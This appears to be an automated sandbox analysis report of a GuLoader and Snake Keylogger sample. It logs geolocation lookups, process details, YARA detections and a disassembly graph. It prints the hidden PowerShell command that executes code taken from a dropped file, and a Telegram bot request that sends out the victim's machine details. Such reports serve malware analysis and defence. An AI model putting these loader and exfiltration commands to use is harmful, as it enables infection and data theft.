                                                                            2024-11-04 06:13:47 UTC151INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e
                                                                            Data Ascii: <Response><IP>173.254.250.69</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>
                                                                            2024-11-04 06:13:47 UTC208INData Raw: 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                            Data Ascii: Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.549864188.114.96.34431128C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-11-04 06:13:49 UTC63OUTGET /xml/173.254.250.69 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            2024-11-04 06:13:49 UTC1222INHTTP/1.1 200 OK
                                                                            Date: Mon, 04 Nov 2024 06:13:49 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 359
                                                                            Connection: close
                                                                            x-amzn-requestid: e4efa8e8-d13f-4030-8c31-0e7b32b72f8c
                                                                            x-amzn-trace-id: Root=1-67284a0a-5b7499381717d30a571c92ee;Parent=0a40f8dd062bc641;Sampled=0;Lineage=1:fc9e8231:0
                                                                            x-cache: Miss from cloudfront
                                                                            via: 1.1 5b3c6a4e26bbf4961fe156f79327ee02.cloudfront.net (CloudFront)
                                                                            x-amz-cf-pop: DFW57-P5
                                                                            x-amz-cf-id: LMfxpBeIdc4uOv1BySdpGpuw_XLxIRzGp39Pi6z_r4dkQmtoLPl60w==
                                                                            Cache-Control: max-age=31536000
                                                                            CF-Cache-Status: HIT
                                                                            Age: 7187
                                                                            Last-Modified: Mon, 04 Nov 2024 04:14:02 GMT
                                                                            Accept-Ranges: bytes
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z5IP%2F%2F%2B21qSQOYDSIhZU8H1l0dyHSaTyT%2BLS9qyZ%2B4dVX%2ByViPmTV1p1bKdprK6oabUJNG3azdMuVVMd8rAKjCGWRMdILGetC4V99wdK4zf4DJsM2nsXm8emyrM2YNwB1PnYgcrT"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8dd275d5cbcea924-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1139&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2639927&cwnd=201&unsent_bytes=0&cid=c07eb21296ce39a6&ts=149&x=0"
                                                                            2024-11-04 06:13:49 UTC147INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e
                                                                            Data Ascii: <Response><IP>173.254.250.69</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionN
                                                                            2024-11-04 06:13:49 UTC212INData Raw: 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                            Data Ascii: ame>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.549876188.114.96.34431128C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-11-04 06:13:50 UTC87OUTGET /xml/173.254.250.69 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            Connection: Keep-Alive
                                                                            2024-11-04 06:13:50 UTC1216INHTTP/1.1 200 OK
                                                                            Date: Mon, 04 Nov 2024 06:13:50 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 359
                                                                            Connection: close
                                                                            x-amzn-requestid: e4efa8e8-d13f-4030-8c31-0e7b32b72f8c
                                                                            x-amzn-trace-id: Root=1-67284a0a-5b7499381717d30a571c92ee;Parent=0a40f8dd062bc641;Sampled=0;Lineage=1:fc9e8231:0
                                                                            x-cache: Miss from cloudfront
                                                                            via: 1.1 5b3c6a4e26bbf4961fe156f79327ee02.cloudfront.net (CloudFront)
                                                                            x-amz-cf-pop: DFW57-P5
                                                                            x-amz-cf-id: LMfxpBeIdc4uOv1BySdpGpuw_XLxIRzGp39Pi6z_r4dkQmtoLPl60w==
                                                                            Cache-Control: max-age=31536000
                                                                            CF-Cache-Status: HIT
                                                                            Age: 7188
                                                                            Last-Modified: Mon, 04 Nov 2024 04:14:02 GMT
                                                                            Accept-Ranges: bytes
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CdY2aE7rVqHgZ6D%2Bl1H2g8Hydx74MrnT6rxTL7GvbKc8FLjC6I9CNzVcUDYYTsWpx6cr%2FeaRnLhwbQ9J7qcd1cDOMTKbE2dnjdiYIWrp20qDighOGXHhPHWMc%2FqZx4eWglqxWL7i"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8dd275dfdf51e962-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1649&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1645454&cwnd=251&unsent_bytes=0&cid=c3abf3c13f66d44e&ts=150&x=0"
                                                                            2024-11-04 06:13:50 UTC153INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65
                                                                            Data Ascii: <Response><IP>173.254.250.69</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Te
                                                                            2024-11-04 06:13:50 UTC206INData Raw: 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                            Data Ascii: xas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            7192.168.2.549887188.114.96.34431128C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-11-04 06:13:52 UTC63OUTGET /xml/173.254.250.69 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            2024-11-04 06:13:52 UTC1222INHTTP/1.1 200 OK
                                                                            Date: Mon, 04 Nov 2024 06:13:52 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 359
                                                                            Connection: close
                                                                            x-amzn-requestid: e4efa8e8-d13f-4030-8c31-0e7b32b72f8c
                                                                            x-amzn-trace-id: Root=1-67284a0a-5b7499381717d30a571c92ee;Parent=0a40f8dd062bc641;Sampled=0;Lineage=1:fc9e8231:0
                                                                            x-cache: Miss from cloudfront
                                                                            via: 1.1 5b3c6a4e26bbf4961fe156f79327ee02.cloudfront.net (CloudFront)
                                                                            x-amz-cf-pop: DFW57-P5
                                                                            x-amz-cf-id: LMfxpBeIdc4uOv1BySdpGpuw_XLxIRzGp39Pi6z_r4dkQmtoLPl60w==
                                                                            Cache-Control: max-age=31536000
                                                                            CF-Cache-Status: HIT
                                                                            Age: 7190
                                                                            Last-Modified: Mon, 04 Nov 2024 04:14:02 GMT
                                                                            Accept-Ranges: bytes
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PIJE%2FBl6n%2BN0qa6%2BhG8Q21IBQE%2FsKFGe%2F7Oetr6ybuzcSaL2rYqY0V4OUsT6NFxdkUMnByJ9XZfUMRlkh2CaysKD8jTL1vmHGAKVhNPzBSaxqr7BODTZ%2Bk2eK5Dn3Z2ThyK27TYn"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8dd275e9ec994751-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1221&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2253696&cwnd=251&unsent_bytes=0&cid=e780448b34e4e460&ts=144&x=0"
                                                                            2024-11-04 06:13:52 UTC147INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e
                                                                            Data Ascii: <Response><IP>173.254.250.69</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionN
                                                                            2024-11-04 06:13:52 UTC212INData Raw: 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                            Data Ascii: ame>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            8192.168.2.549895188.114.96.34431128C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-11-04 06:13:53 UTC87OUTGET /xml/173.254.250.69 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            Connection: Keep-Alive
                                                                            2024-11-04 06:13:53 UTC1214INHTTP/1.1 200 OK
                                                                            Date: Mon, 04 Nov 2024 06:13:53 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 359
                                                                            Connection: close
                                                                            x-amzn-requestid: e4efa8e8-d13f-4030-8c31-0e7b32b72f8c
                                                                            x-amzn-trace-id: Root=1-67284a0a-5b7499381717d30a571c92ee;Parent=0a40f8dd062bc641;Sampled=0;Lineage=1:fc9e8231:0
                                                                            x-cache: Miss from cloudfront
                                                                            via: 1.1 5b3c6a4e26bbf4961fe156f79327ee02.cloudfront.net (CloudFront)
                                                                            x-amz-cf-pop: DFW57-P5
                                                                            x-amz-cf-id: LMfxpBeIdc4uOv1BySdpGpuw_XLxIRzGp39Pi6z_r4dkQmtoLPl60w==
                                                                            Cache-Control: max-age=31536000
                                                                            CF-Cache-Status: HIT
                                                                            Age: 7191
                                                                            Last-Modified: Mon, 04 Nov 2024 04:14:02 GMT
                                                                            Accept-Ranges: bytes
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Mz6WCE8F6fztWA8o3t5Se7z0QyDF3qxxczbbEbQamwuKE3aKSrKBOSaqnQHWBPoBrXqSYu%2BC2Aypg2Ljx7Hp1eUp1R5pnqIbXIXSbsD4dq6Bke53rzMKvCq%2FXxE4CxVBhCe9y7o"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8dd275f3cbf24863-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2037&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1397009&cwnd=247&unsent_bytes=0&cid=5dd0173357af496a&ts=144&x=0"
                                                                            2024-11-04 06:13:53 UTC155INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61
                                                                            Data Ascii: <Response><IP>173.254.250.69</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texa
                                                                            2024-11-04 06:13:53 UTC204INData Raw: 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                            Data Ascii: s</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            9192.168.2.549901149.154.167.2204431128C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-11-04 06:13:54 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2004/11/2024%20/%2016:35:45%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                            Host: api.telegram.org
                                                                            Connection: Keep-Alive
                                                                            2024-11-04 06:13:55 UTC344INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.18.0
                                                                            Date: Mon, 04 Nov 2024 06:13:54 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 55
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                            2024-11-04 06:13:55 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                            Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Target ID:0
                                                                            Start time:01:13:01
                                                                            Start date:04/11/2024
                                                                            Path:C:\Users\user\Desktop\DOC11042024.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\DOC11042024.exe"
                                                                            Imagebase:0x400000
                                                                            File size:677'344 bytes
                                                                            MD5 hash:2119B4C15A036B7E407A7483A89ECDBF
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:2
                                                                            Start time:01:13:02
                                                                            Start date:04/11/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:powershell.exe -windowstyle hidden "$Unproded=Get-Content -raw 'C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213\Isbjergs.Krs';$Acockbill=$Unproded.SubString(73125,3);.$Acockbill($Unproded) "
                                                                            Imagebase:0x560000
                                                                            File size:433'152 bytes
                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2345390385.000000000A530000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:3
                                                                            Start time:01:13:02
                                                                            Start date:04/11/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff6d64d0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:5
                                                                            Start time:01:13:31
                                                                            Start date:04/11/2024
                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                            Imagebase:0x9b0000
                                                                            File size:59'904 bytes
                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.3282055116.0000000021C11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Disassembly

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:23.4%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:21.6%
                                                                              Total number of Nodes:1303
                                                                              Total number of Limit Nodes:45
                                                                              execution_graph 3897 401d41 GetDC GetDeviceCaps 3898 402ab3 18 API calls 3897->3898 3899 401d5f MulDiv ReleaseDC 3898->3899 3900 402ab3 18 API calls 3899->3900 3901 401d7e 3900->3901 3902 405ec4 18 API calls 3901->3902 3903 401db7 CreateFontIndirectW 3902->3903 3904 4024e6 3903->3904 3905 401a42 3906 402ab3 18 API calls 3905->3906 3907 401a48 3906->3907 3908 402ab3 18 API calls 3907->3908 3909 4019f0 3908->3909 3917 404545 3918 404555 3917->3918 3919 40457b 3917->3919 3920 4040f1 19 API calls 3918->3920 3921 404158 8 API calls 3919->3921 3922 404562 SetDlgItemTextW 3920->3922 3923 404587 3921->3923 3922->3919 3924 401cc6 3925 402ab3 18 API calls 3924->3925 3926 401cd9 SetWindowLongW 3925->3926 3927 40295d 3926->3927 3196 401dc7 3204 402ab3 3196->3204 3198 401dcd 3199 402ab3 18 API calls 3198->3199 3200 401dd6 3199->3200 3201 401de8 EnableWindow 3200->3201 3202 401ddd ShowWindow 3200->3202 3203 40295d 3201->3203 3202->3203 3205 405ec4 18 API calls 3204->3205 3206 402ac7 3205->3206 3206->3198 3207 401bca 3208 402ab3 18 API calls 3207->3208 3209 401bd1 3208->3209 3210 402ab3 18 API calls 3209->3210 3211 401bdb 3210->3211 3212 401beb 3211->3212 3213 402ad0 18 API calls 3211->3213 3214 402ad0 18 API calls 3212->3214 3218 401bfb 3212->3218 3213->3212 3214->3218 3215 401c06 3219 402ab3 18 API calls 3215->3219 3216 401c4a 3217 402ad0 18 API calls 3216->3217 3220 401c4f 3217->3220 3218->3215 3218->3216 3221 401c0b 3219->3221 3222 402ad0 18 API calls 3220->3222 3223 402ab3 18 API calls 3221->3223 3224 401c58 FindWindowExW 3222->3224 3225 401c14 3223->3225 3228 401c7a 3224->3228 3226 401c3a SendMessageW 3225->3226 3227 401c1c SendMessageTimeoutW 3225->3227 3226->3228 3227->3228 3928 4050ca 3929 4050da 3928->3929 3930 4050ee 3928->3930 3932 4050e0 3929->3932 3940 405137 3929->3940 3931 4050f6 IsWindowVisible 3930->3931 3937 40510d 3930->3937 3933 405103 3931->3933 3931->3940 3935 40413d SendMessageW 3932->3935 3941 404a20 SendMessageW 3933->3941 3934 40513c CallWindowProcW 3938 4050ea 3934->3938 3935->3938 3937->3934 3946 404aa0 3937->3946 3940->3934 3942 404a43 GetMessagePos ScreenToClient SendMessageW 3941->3942 3943 404a7f SendMessageW 3941->3943 3944 404a77 3942->3944 3945 404a7c 3942->3945 3943->3944 3944->3937 3945->3943 3955 405ea2 lstrcpynW 3946->3955 3948 404ab3 3956 405de9 wsprintfW 3948->3956 3950 404abd 3951 40140b 2 API calls 3950->3951 3952 404ac6 3951->3952 3957 405ea2 lstrcpynW 3952->3957 3954 404acd 3954->3940 3955->3948 3956->3950 3957->3954 3958 4024ca 3959 402ad0 18 API calls 3958->3959 3960 4024d1 3959->3960 3963 405b2b GetFileAttributesW CreateFileW 3960->3963 3962 4024dd 3963->3962 3248 4014cb 3249 405156 25 API calls 3248->3249 3250 4014d2 3249->3250 3964 40194b 3965 402ab3 18 API calls 3964->3965 3966 401952 3965->3966 3967 402ab3 18 API calls 3966->3967 3968 40195c 3967->3968 3969 402ad0 18 API calls 3968->3969 3970 401965 3969->3970 3971 401979 lstrlenW 3970->3971 3972 4019b5 3970->3972 3973 401983 3971->3973 3973->3972 3977 405ea2 lstrcpynW 3973->3977 3975 40199e 3975->3972 3976 4019ab lstrlenW 3975->3976 3976->3972 3977->3975 3978 40274b 3979 402ad0 18 API calls 3978->3979 3980 402759 3979->3980 3981 40276f 3980->3981 3983 402ad0 18 API calls 3980->3983 3982 405b06 2 API calls 3981->3982 3984 402775 3982->3984 3983->3981 4004 405b2b GetFileAttributesW CreateFileW 3984->4004 3986 402782 3987 40282b 3986->3987 3988 40278e GlobalAlloc 3986->3988 3991 402833 DeleteFileW 3987->3991 3992 402846 3987->3992 3989 402822 CloseHandle 3988->3989 3990 4027a7 3988->3990 3989->3987 4005 4032d1 SetFilePointer 3990->4005 3991->3992 3994 4027ad 3995 40329f ReadFile 3994->3995 3996 4027b6 GlobalAlloc 3995->3996 3997 4027c6 3996->3997 3998 4027fa WriteFile GlobalFree 3996->3998 4000 402ff8 48 API calls 3997->4000 3999 402ff8 48 API calls 3998->3999 4001 40281f 3999->4001 4003 4027d3 4000->4003 4001->3989 4002 4027f1 GlobalFree 4002->3998 4003->4002 4004->3986 4005->3994 4006 40284c 4007 402ab3 18 API calls 4006->4007 4008 402852 4007->4008 4009 402875 4008->4009 4010 40288e 4008->4010 4019 402729 4008->4019 4011 40287a 4009->4011 4012 40288b 4009->4012 4013 4028a4 4010->4013 4014 402898 4010->4014 4020 405ea2 lstrcpynW 4011->4020 4021 405de9 wsprintfW 4012->4021 4015 405ec4 18 API calls 4013->4015 4016 402ab3 18 API calls 